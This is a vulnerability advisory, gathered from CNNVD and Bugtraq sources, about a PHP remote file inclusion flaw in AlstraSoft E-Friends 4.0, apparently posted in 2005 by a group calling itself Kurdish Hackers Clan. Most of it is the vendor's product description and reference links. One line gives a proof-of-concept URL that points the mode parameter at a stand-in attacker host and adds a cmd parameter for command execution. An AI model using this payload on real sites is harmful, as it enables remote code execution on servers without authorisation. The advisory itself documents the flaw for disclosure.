https://cxsecurity.com/issue/WLB-2005090019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-257

AlstraSoftE-Friends是一款商业交友系统。AlstraSoftE-Friends4.0中的index.php脚本存在PHP远程文件包含漏洞，远程攻击者可以通过mode参数来执行任意PHP代码。

AlstraSoft E-Friends Remote command exucetion

Site : http://www.alstrasoft.com/efriends.htm

Description :

AlstraSoft E-Friends is an online social networking software that allows you to start your own site just like Friendster and Tribe.net. The E-Friends software allows members to connect to people in their personal networks and community, creating a new online interactive resource that is based on a trusted network of friends and associates on the internet.

Members can use this abundant network to make friends, find their love ones, locate jobs, buy and sell stuff, locate a roommate, and accomplish much more with the help of groups and individuals who they know and share the same interests.

With our new 4.0 release, you can now start a profitable social networking business by creating custom membership packages using Paypal payment gateway. In addition, we have added several new exciting features including online blog, forums, text-based chat, events and many more! Enhancements are also added to the admin backend and with our integrated banner ads system, you can earn extra income by publishing paid banner ads on your E-Friends site.

Vulnerable: http://www.ownz.net/index.php?mode=http://evilcode?&cmd=

Solution : no :P

Contact : khc (at) bsdmail (dot) org [email concealed]

Kurdish Hackers Clan!

来源:BID
名称:14932
链接:http://www.securityfocus.com/bid/14932
来源:SECUNIA
名称:16941
链接:http://secunia.com/advisories/16941/
来源:SREASON
名称:22
链接:http://securityreason.com/securityalert/22
来源:BUGTRAQ
名称:20050924AlstraSoftE-FriendsRemoteCommandExucetion
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112758134227112&w;=2